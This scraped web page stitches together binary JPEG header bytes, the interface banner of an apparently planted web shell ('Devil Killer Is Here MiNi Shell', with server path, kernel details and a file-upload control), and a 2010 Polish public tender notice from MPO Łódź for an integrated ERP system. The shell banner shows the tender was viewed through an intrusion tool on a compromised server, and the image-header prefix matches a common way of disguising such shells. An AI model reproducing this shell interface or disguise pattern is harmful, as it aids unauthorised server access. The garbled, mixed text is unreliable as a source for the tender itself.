JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100707/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100707/199904-N-2010.html

<p class="kh_header"><b>Łódź: Dostawa i wdrożenie Zintegrowanego Systemu Informatycznego (ZSI) wspomagającego pracę MPO -  Łódź Sp. z o.o.</b><br>
<b>Numer ogłoszenia: 199904 - 2010; data zamieszczenia: 07.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedsiębiorstwo Oczyszczania - Łódź Sp. z o.o. , ul. Tokarzewskiego 2, 91-842 Łódź, woj. łódzkie, tel. 042 6160209, faks 042 6160751.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mpolodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i wdrożenie Zintegrowanego Systemu Informatycznego (ZSI) wspomagającego pracę MPO -  Łódź Sp. z o.o..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:  
2.1	Wykonanie analizy przedwdrożeniowej i przedstawienie harmonogramu wdrażania ZSI.
2.2	Wdrożenie Zintegrowanego Systemu Informatycznego jako zespołu narzędzi i funkcjonalności opartego na jednej platformie programowej i jednej bazie danych, wspomagającego zarządzanie w przedsiębiorstwie, optymalizującego procesy wewnętrzne i zewnętrzne zachodzące w jego najbliższym otoczeniu, obejmującego następujące obszary działalności przedsiębiorstwa:
2.2.1. Finanse i księgowość
2.2.2. Kadry i płace 
2.2.3. Ewidencja środków trwałych i wartości niematerialnych i prawnych
2.2.4. Magazyn (części zamiennych, chemiczny, pojemników, paliw)
2.2.5.  Biuro Obsługi Klienta (oraz iBOK) / Logistyka usług - sprzedaż i realizacja usług
2.2.6. Zarządzanie bazą transportową i serwisem ( Dział Napraw i Remontów, Dział Kontroli Diagnostycznej)
2.2.7. Zarządzanie gospodarką odpadami ( Dział Przeładunku i Segregacji odpadów wraz z magazynem surowców wtórnych i Składowisko balastu)
2.2.8. Windykacja i sprawy sądowe
2.2.9. Stacja diagnostyczna - sprzedaż pozostała
2.2.10. Zestawienia analityczne dla Zarządu i Rady Nadzorczej, controlling
2.3	Dostawa, instalacja i wdrożenie zintegrowanego systemu informatycznego  (licencji ZSI i licencji dostępowych oprogramowania aplikacyjnego). Wykonawca dostarczy, zainstaluje, skonfiguruje i dostosuje do potrzeb Zamawiającego  na jego serwerze i stacjach roboczych Zintegrowany System Informatyczny zgodnie z niniejszą SIWZ w ilości licencji: 
2.3.1. moduł Finanse i księgowość - 8 stanowisk
2.3.2. moduł Kadry i płace - 7 stanowisk
2.3.3. moduł Ewidencja środków trwałych i wartości niematerialnych i prawnych - 2 stanowiska
2.3.4. moduł Magazyn (części zamiennych, chemiczny, pojemników, paliw) - 7 stanowisk
2.3.5. moduł Biuro Obsługi Klienta (oraz iBOK) / Logistyka usług - sprzedaż i realizacja usług - 23 stanowiska
2.3.6. moduł Zarządzanie bazą transportową i serwisem ( Dział Napraw i Remontów, Dział Kontroli Diagnostycznej) - 2 stanowiska
2.3.7. moduł Zarządzanie gospodarką odpadami ( Dział Przeładunku i Segregacji odpadów wraz z magazynem surowców wtórnych i Składowisko balastu) - 4 stanowiska
2.3.8. moduł Windykacja i sprawy sądowe - 8 stanowisk
2.3.9. moduł Stacja diagnostyczna - sprzedaż pozostała - 1 stanowisko
2.3.10. moduł Zestawienia analityczne dla Zarządu i Rady Nadzorczej, controlling - 8 stanowisk
2.3.11 baza danych na 70 licencji
Zamawiający dopuszcza zmianę ilości licencji jeśli po analizie potrzeb lub w trakcie wdrożenia taka konieczność wystąpi.
2.4	Przeprowadzenie importów danych z programów dotychczas użytkowanych przez Zamawiającego.
2.5	Przeprowadzenie integracji z systemem Zamawiającego do:
2.5.1	 obsługi wag na sortowni odpadów - druga lokalizacja Zamawiającego ( program SCALEX EKO)
2.5.2	obsługi dystrybutorów na Stacji paliw ( AUTOPOLL - program HECTRONIC)
2.6	Przeprowadzenie instruktażu/szkoleń użytkowników ZSI. 
Wykonawca przeprowadzi szkolenia dla użytkowników i administratorów w wymaganym zakresie niezbędnym dla osiągnięcia celów wdrożenia i wymaganych przez Zamawiającego funkcjonalności ZSI. Wykonawca dostarczy instrukcję obsługi funkcjonalności ZSI, pozwalającą na samodzielne uczenie się obsługi oprogramowania. 
2.7	Nadzór nad wdrożeniem ZSI.
2.8	Opieka nad systemem poprzez bezpłatne usuwanie ewentualnych nieprawidłowości w oprogramowaniu przez okres 24 miesięcy od daty odbioru końcowego zgodnie z zapisami wzoru umowy (załącznik nr 7 do SIWZ). 
Wykonawca zobowiązuje się zapewnić pełną funkcjonalność ZSI poprzez bezpłatne usuwanie ewentualnych nieprawidłowości w oprogramowaniu przez okres 24 miesięcy od daty zakończenia wdrożenia, bezpłatne dostarczanie nowych wersji oprogramowania przez okres 24 miesięcy od daty zakończenia wdrożenia, z adaptacją do przepisów obowiązującego prawa, wprowadzanie zmian do dokumentacji wynikających ze zmiany przepisów prawnych.
2.9	Opieka nad systemem poprzez obsługę i serwis ZSI od czasu upływu gwarancji do zakończenia terminu obowiązywania umowy. 
Wykonawca zobowiązuje się zapewnić serwis i aktualizację ZSI do nowszych wersji, poprzez usuwanie ewentualnych nieprawidłowości w funkcjonowaniu oprogramowania, aktualizację do przepisów obowiązującego prawa, wprowadzanie zmian do dokumentacji wynikających ze zmiany przepisów prawnych. 
2.10	  Wykonawca dostarczy dokumentację oprogramowania zgodnie z art. 10 Ustawy z dnia 29 września 1994 roku o rachunkowości ( Dz.U. Nr 121 poz. 591)  z późn. zmianami.   
UWAGA!! Wskazane jest, aby Wykonawca przed złożeniem oferty zapoznał się z siecią komputerową znajdującą się w obiektach Zamawiającego po uprzednim uzgodnieniu terminu z Zamawiającym.
3.	Wymagania ogólne dla  ZSI
3.1  ZSI musi pracować w oparciu o serwer Zamawiającego: HP ProLiant ML 370G5, Xeon E5420 2,50 GHz (łącznie 8 rdzeni) 4 GB RAM, Win 2003 R2 Standard Edition, Macierz 700 GB oraz stacje klienckie  z systemem XP lub wyższym. Zamawiający dopuszcza możliwość dostosowania posiadanego serwera do programu ZSI.
3.2 ZSI musi być zgodny z polskim prawem.
3.3. ZSI poza posiadanymi wymaganiami funkcjonalnymi, musi posiadać narzędzia i funkcjonalności potocznie uznawane za standardowe, charakterystyczne i obligatoryjne dla specyfiki prowadzonej przez Zamawiającego działalności oraz wynikające z obowiązującego prawa polskiego.
3.4. ZSI musi być zintegrowany technologicznie - zbudowany na jednej platformie programowej i posiadać jednolite oprogramowanie bazodanowe i systemowe dla całości wymagań funkcjonalnych określonych przez Zamawiającego w załączniku nr 1  - MSSQL nie niższy niż MSSQL 2005
3.5. ZSI musi być w pełni zintegrowany i posiadać dostęp do informacji bezpośrednio po jej wprowadzeniu w różnych przekrojach i szybki podgląd z różnych poziomów systemu.
3.6. ZSI musi posiadać rozbudowany system udostępniania i ochrony danych.
3.7. ZSI musi być skalowalny i umożliwiać dołączenie dodatkowych modułów aplikacyjnych.
3.8. ZSI musi współpracować z innymi aplikacjami oraz umożliwiać eksport i import danych, umożliwiać definiowanie zbiorów eksportowych i importowych wg potrzeb użytkownika ( MS Office, PŁATNIK, ARISCO, GOMiG)
3.9. ZSI musi pozwalać na korzystanie ze słowników wszędzie tam gdzie jest to możliwe. Powinien być wyposażony w kontrolę merytoryczną i formalną wprowadzania danych, z wykorzystaniem słowników systemowych.
3.10. ZSI musi generować komunikaty i inne informacje wyłącznie w języku polskim.
3.11. ZSI musi posiadać system kontroli uprawnień użytkowników do funkcji (przeglądanie, aktualizacja, usuwanie) i danych przechowywanych przez system
3.12. ZSI musi rejestrować zmiany wprowadzone przez poszczególnych użytkowników, powinien prowadzić historię wprowadzonych zmian danych w systemie, z rejestracją daty, czasu i osoby wprowadzającej zmiany.
3.13. ZSI musi posiadać definiowalne numeratory dokumentów, dowodów księgowych, klientów, pracowników, numerów inwentarzowych środków trwałych, itp.
3.14. ZSI musi umożliwiać swobodny przepływ informacji, umożliwiać kojarzenia z dowolnym obiektem różnych danych występujących w systemie.
3.15. ZSI musi umożliwiać śledzenie i odtworzenie wykonywanych operacji przez użytkowników systemu w celu wykrycia ewentualnych błędów.
3.16. ZSI musi zapewnić możliwość personalizacji ustawień tj. indywidualnego skonfigurowania system na danym stanowisku pracy, tak aby każdy użytkownik miał bezpośredni dostęp do najczęściej wykorzystywanych przez siebie narzędzi i funkcjonalności.
3.17. ZSI musi zapewniać standardy wydruku dokumentów:
a) podgląd dokumentu przed wydrukiem
b) wydruk na drukarce systemowej
c) wydruk do zbioru PDF
d) eksport do pliku tekstowego i xls
3.18. ZSI musi mieć wbudowane narzędzia utrzymania spójności danych systemu, na wypadek sytuacji utraty zasilania, awarii sprzętu lub utraty łączności z komputerem centralnym
3.19. ZSI musi posiadać połączenie z drugą lokalizacją Zamawiającego.
3.20. Wykonawca jest zobowiązany w okresie gwarancyjnym i pogwarancyjnym zapewnić opiekę serwisową, pomoc specjalistów z różnych dziedzin związanych z eksploatacją ZSI oraz pomoc w przeciągu max. 4  godzin od telefonicznego zgłoszenia awarii, usterki. 
3.21. ZSI musi pozwalać na tworzenie kopii zapasowych w czasie pracy bazy danych bez uszczerbku wydajności i szybkości działania systemu.
3.22. ZSI musi być wyposażony w intuicyjny graficzny interfejs użytkownika
3.23. ZSI musi umożliwiać automatyczne generowanie standardowych oraz zaprojektowanych samodzielnie przez użytkownika sprawozdań, raportów i zestawień.
3.24. Wykonawca musi być właścicielem praw autorskich oraz winien posiadać prawo do dysponowania i modyfikacji kodu źródłowego oferowanego ZSI
3.25. Szczegółowe zapisy dotyczące gwarancji zawarte będą we wzorze umowy stanowiącej załącznik do SIWZ na etapie składania ofert..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.26.00.00-5, 72.26.30.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 12 000,00 PLN (słownie: dwanaście  tysięcy złotych PLN). Wadium należy wnieść na etapie składania ofert. Dopuszczalne formy wadium :
Pieniądz (przelew na rachunek bankowy wskazany przez zamawiającego).
	Poręczenia bankowe lub poręczenia spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym  
	Gwarancje bankowe
	Gwarancje ubezpieczeniowe
	Poręczenia udzielane przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn. zm.).
Wadium w formie pieniężnej wykonawca wpłaci przelewem na konto zamawiającego w: Bank Pekao SA III O/Łódź nr 21124030601111000034523764. 
Wadium w pozostałych formach należy złożyć w oryginale w oddzielnej kopercie razem z ofertą z oznaczeniem  Wadium . 
Kserokopię potwierdzenia wniesienia wadium w formie pieniężnej lub kserokopię wadium wniesionego w formie innej niż pieniężna należy dołączyć do oferty. Oferta nie zabezpieczona akceptowalną formą wadium zostanie odrzucona bez rozpatrywania.
Pozostałe informacje dotyczące wadium:
1.	Wadium wnosi się przed upływem terminu składania ofert. 
2.	Wadium będzie zwrócone w terminie i na warunkach wskazanych w art. 46 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych. W przypadku wadium wniesionego w pieniądzu zwrot nastąpi przelewem na rachunek bankowy wskazany w piśmie Wykonawcy, a wniesionego w innej formie - w kasie Zamawiającego.
3.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez zamawiającego, przy czym data wpływu pieniędzy na rachunek Zamawiającego, jest uznana jako data wpłacenia wadium.
4.	Gwarancje ubezpieczeniowe lub gwarancje bankowe złożone jako zabezpieczenie wadium muszą posiadać okres ważności nie krótszy niż okres związania ofertą, (pod rygorem wykluczenia wykonawcy z postępowania) oraz umożliwiać zamawiającemu otrzymanie określonej kwoty wadium bez jakichkolwiek warunków wstępnych i na jego pierwsze wezwanie
5.	Zwrot wadium nastąpi, jeśli zaistnieje jedna z okoliczności wymienionych w art. 46 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Ocena spełnienia warunku dokonywana będzie w oparciu o analizę oświadczeń i dokumentów złożonych we wniosku na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim doświadczeniem. Każdy wykonawca musi wykazać się wykonaniem co najmniej 2 zakończonymi wdrożeniami zintegrowanych systemów informatycznych w języku polskim do zarządzania przedsiębiorstwem realizującym zadania z zakresu gospodarki odpadami, o wartości min. 320 000 zł netto, wykonanych w okresie ostatnich 3 lat przed złożeniem wniosku o dopuszczenie do udziału w postępowaniu oraz przedstawią dokumenty potwierdzające, że te wdrożenia zostały wykonane należycie i w umownym terminie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem kadrowym  zapewniającym wykonanie zamówienia w postaci osób zdolnych do wykonania zamówienia, tj. odpowiednią liczbą programistów zapewniającą możliwość modyfikacji pod potrzeby Zamawiającego i rozwój produktu oraz zatrudniać odpowiednią liczbę specjalistów ds. wdrożeń, zapewniającą sprawne wdrożenie oraz bezpieczną obsługę informatyczną ( minimum 15 zatrudnionych na w/w stanowiskach).   Ocena tego warunku odbywać się będzie na podstawie złożonego wykazu osób na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Każdy wykonawca musi posiadać opłaconą polisę OC w zakresie prowadzonej działalności na minimum 1 000 000  zł. przez cały okres obowiązywania umowy. W przypadku wygaśnięcia ubezpieczenia przed końcem zawartej umowy, każdy wykonawca zobowiązany jest złożyć oświadczenie o kontynuowaniu ubezpieczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Referencje potwierdzające prawidłowe wykonanie wdrożeń wymienionych w załączniku nr 3.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Aktualne pełnomocnictwo udzielone osobie podpisującej dokumenty ofertowe, o ile jej prawo do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost z dokumentu rejestrowego.
2.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) do wniosku należy dołączyć pełnomocnictwo dla konsorcjum.
3.	Oświadczenie o kontynuowaniu ubezpieczenia.
